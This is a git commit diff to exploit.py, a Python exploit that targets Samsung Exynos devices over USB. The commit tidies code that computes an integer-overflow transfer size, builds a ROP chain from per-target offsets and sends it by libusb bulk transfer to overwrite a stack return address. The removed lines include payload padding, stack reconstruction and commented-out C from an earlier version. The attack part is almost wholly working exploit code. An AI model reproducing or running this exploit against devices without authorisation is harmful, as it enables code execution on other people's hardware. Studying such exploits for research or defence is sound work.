removed static code
This commit is contained in:
parent
ead9a8a197
commit
d7a740d173
73
exploit.py
73
exploit.py
@ -92,8 +92,9 @@ class ExynosDevice():
|
||||
current_offset = TARGET_OFFSETS[self.target][0]
|
||||
transferred = ctypes.c_int()
|
||||
|
||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
||||
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
|
||||
max_payload_size = 0x100000000 - size_to_overflow
|
||||
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
|
||||
|
||||
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
|
||||
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
|
||||
@ -133,11 +134,8 @@ class ExynosDevice():
|
||||
cnt += 1
|
||||
print(f"{cnt} {hex(current_offset)}")
|
||||
|
||||
rop_chain = (b"\x00" * 0x110) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||
# p_offset = (TARGET_OFFSETS[self.target][1] - current_offset)
|
||||
# rop_chain = rop_chain[:p_offset] + (p64(TARGET_OFFSETS[self.target][0]))
|
||||
# rop_chain = p64(TARGET_OFFSETS[self.target][0]) * 32
|
||||
# Should
|
||||
# Build ROP chain.
|
||||
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
|
||||
transferred = ctypes.c_int(0)
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
|
||||
@ -146,70 +144,7 @@ class ExynosDevice():
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
|
||||
|
||||
|
||||
padding_size = TARGET_OFFSETS[self.target][1] - TARGET_OFFSETS[self.target][0]
|
||||
padding_size -= len(payload)
|
||||
|
||||
|
||||
# Construct payload, we can only overflow with 1 transfer.
|
||||
dl_buf_current = DL_BUFFER_START
|
||||
|
||||
if len(payload) > MAX_PAYLOAD_SIZE:
|
||||
print("payload too big!")
|
||||
return
|
||||
|
||||
payload = payload + ((MAX_PAYLOAD_SIZE - len(payload)) * b"\xcc")
|
||||
payload = struct.pack("<II", 0, MAX_PAYLOAD_SIZE) + \
|
||||
payload + struct.pack("H", 0)
|
||||
|
||||
assert (len(payload) == BLOCK_SIZE)
|
||||
|
||||
|
||||
# while True:
|
||||
# print(".", end="")
|
||||
# self.write(b"")
|
||||
|
||||
|
||||
padding_size = TARGET_OFFSETS[self.target][1] - \
|
||||
TARGET_OFFSETS[self.target][0]
|
||||
|
||||
padding_size -= MAX_PAYLOAD_SIZE
|
||||
padding_size += 8
|
||||
|
||||
chunk_cnt = padding_size // CHUNK_SIZE
|
||||
padding_size = padding_size % CHUNK_SIZE
|
||||
block_cnt = padding_size // BLOCK_SIZE
|
||||
padding_size = padding_size % BLOCK_SIZE
|
||||
|
||||
if (padding_size == 0 and block_cnt > 0):
|
||||
block_cnt -= 1
|
||||
padding_size = BLOCK_SIZE
|
||||
|
||||
|
||||
ram_size = padding_size + 4 + 2
|
||||
|
||||
# # Reconstruct stack
|
||||
ram = b"\xcc" * ram_size
|
||||
ram = ram[:padding_size] + p32(TARGET_OFFSETS[self.target][0]) + ram[padding_size + 4:]
|
||||
|
||||
# *(uint32_t*)&ram[padding_size] = targets[target_id][XFER_BUFFER];//overwriting return address in stack :]
|
||||
payload_size = len(payload) + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size
|
||||
pass
|
||||
# payload->size = original_payload_size + (CHUNK_SIZE * chunk_cnt) + (BLOCK_SIZE * block_cnt) + ram_size;
|
||||
# dprint("malicious payload->size=0x%x\n", payload->size);
|
||||
|
||||
# uint32_t min_size_to_overflw = (uint32_t)0 - targets[target_id][XFER_BUFFER];
|
||||
# dprint("min_size_to_overflw = 0x%x\n", min_size_to_overflw);
|
||||
# if(min_size_to_overflw > payload->size)
|
||||
# printf("ERROR : min_size_to_overflw > payload->size\n");
|
||||
|
||||
# // step 3 : usb communication
|
||||
# printf("- exploit: sending payload...\n");
|
||||
# rc = libusb_bulk_transfer(handle, LIBUSB_ENDPOINT_OUT | 2, (uint8_t*)payload, original_payload_size, &transferred, 0);
|
||||
# if(rc) {
|
||||
# printf("libusb_bulk_transfer LIBUSB_ENDPOINT_OUT: error %d\n", rc);
|
||||
# fprintf(stderr, "Error libusb_bulk_transfer: %s\n", libusb_error_name(rc));
|
||||
# return rc;
|
||||
# }
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
|
Loading…
Reference in New Issue
Block a user